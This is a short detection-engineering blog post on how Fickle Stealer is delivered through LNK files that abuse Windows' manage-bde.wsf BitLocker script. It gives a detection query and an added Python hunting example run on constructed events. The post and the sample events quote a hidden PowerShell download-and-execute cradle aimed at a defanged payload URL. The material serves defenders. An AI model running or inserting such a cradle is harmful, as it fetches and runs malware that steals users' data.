202. Adversaries Misuse a Script for Managing BitLocker to Deliver Fickle Stealer
Hello everyone!
Stealers again! This time we're going to talk about Fickle Stealer and an interesting delivery method leveraged by the threat actors.
So, the adversary used malicious LNK files to misuse a script for managing BitLocker (manage-bde.wsf, a legitimate Windows Script Host script shipped in System32) to download and execute a PowerShell script:
"C:\Windows\System32\manage-bde.wsf" & powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "
The .wsf script is executed via wscript.exe (note that cscript.exe can host the same script), so we can build our detection logic on the suspicious combination of command line parameters: the script name alone is seen in benign administrative use, but together with a hidden PowerShell download cradle it is a strong signal:
event_type: "processcreatewin"
AND
proc_file_path: "wscript.exe"
AND
cmdline: ("manage-bde" AND "powershell" AND "hidden")
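To show the rule above in action, here is an added example (not part of the original post, and not the author's own tooling) that applies the same three conditions to process-creation events. The event records, field names and command lines are constructed for the demonstration; the benign record with a "-status" argument and the detection of cscript.exe as a second Windows Script Host binary are assumptions that go slightly beyond the post's query, which names wscript.exe only.

```python
import re
from typing import Iterable

# Constructed sample process-creation events (not real telemetry).
# Event 0: benign administrative run of the script.
# Event 1: mirrors the LNK-driven abuse described in the post.
# Event 2: a PowerShell download cradle not launched through a WSH host,
#          so it falls outside this particular rule.
SAMPLE_EVENTS = [
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\wscript.exe",
        "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Windows\System32\manage-bde.wsf" -status',
    },
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\wscript.exe",
        "cmdline": (r'"C:\Windows\System32\wscript.exe" "C:\Windows\System32\manage-bde.wsf" '
                    r'& powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "'),
    },
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -nop -w hidden -c iex(iwr hxxps://example[.]invalid/x.ps1)",
    },
]

# Windows Script Host binaries that can run a .wsf. The post's query names
# wscript.exe only; cscript.exe is added here (assumption) because it hosts
# the same script.
WSH_HOSTS = {"wscript.exe", "cscript.exe"}

# All three tokens must be present; "manage-bde" by itself is benign admin use.
REQUIRED_TOKENS = ("manage-bde", "powershell", "hidden")

def is_wsh_host(proc_file_path: str) -> bool:
    """Match on the binary's basename, case-insensitively, so path variants do not matter."""
    basename = proc_file_path.replace("/", "\\").rsplit("\\", 1)[-1]
    return basename.lower() in WSH_HOSTS

def matches_rule(event: dict) -> bool:
    """Apply the post's rule: process creation + WSH host + all three cmdline tokens."""
    if event.get("event_type") != "processcreatewin":
        return False
    if not is_wsh_host(event.get("proc_file_path", "")):
        return False
    cmdline = event.get("cmdline", "").lower()
    return all(token in cmdline for token in REQUIRED_TOKENS)

# Pulls both live and defanged (hxxp/hxxps) URLs out of a command line.
URL_RE = re.compile(r"\b(?:hxxps?|https?)://[^\s'\")]+", re.IGNORECASE)

def extract_urls(cmdline: str) -> list[str]:
    """Collect download URLs from a matching command line for enrichment or blocking."""
    return URL_RE.findall(cmdline)

def hunt(events: Iterable[dict]) -> list[dict]:
    """Return one hit per matching event, with the extracted URLs attached."""
    hits = []
    for event in events:
        if matches_rule(event):
            hits.append({"cmdline": event["cmdline"], "urls": extract_urls(event["cmdline"])})
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("HIT:", hit["cmdline"])
        print("     URLs:", hit["urls"])
```

Only the second event fires: the first carries the script name but no PowerShell, and the third has the cradle but no Windows Script Host parent, which is exactly the narrowing the three-term AND in the query provides.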
See you tomorrow!